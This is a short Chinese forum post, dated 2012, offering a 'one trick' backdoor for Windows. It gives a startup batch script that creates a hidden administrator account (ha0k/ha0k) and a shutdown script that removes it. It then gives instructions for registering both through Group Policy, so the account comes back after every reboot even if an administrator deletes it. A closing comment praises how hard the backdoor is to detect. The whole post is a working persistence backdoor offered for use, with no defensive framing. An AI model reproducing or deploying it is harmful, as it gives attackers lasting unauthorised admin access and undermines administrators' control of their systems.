一招创建无法检测与删除的后门方法

[复制链接]
查看379 | 回复0 | 2012-4-1 19:20:23 | 显示全部楼层 |阅读模式
来源:ha0k
开机.bat

@echooff

netuserha0kha0k/add

netlocalgroupadministratorsha0k/add
关机.bat

@echooff

netuserha0k/del
使用方法:

开始/运行/gpedit.msc

计算机设置/windows设置/脚本(启动/关机)

双击右侧启动,将开机.bat移到该目录

双击右侧关机,将关机.bat移到该目录

选定即可


读后评:此方法的确不意被察觉,利用组策略中启动加载脚本自动创建账号即可管理员发现删除了账号由于服务器更新重启又会自动添加。
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则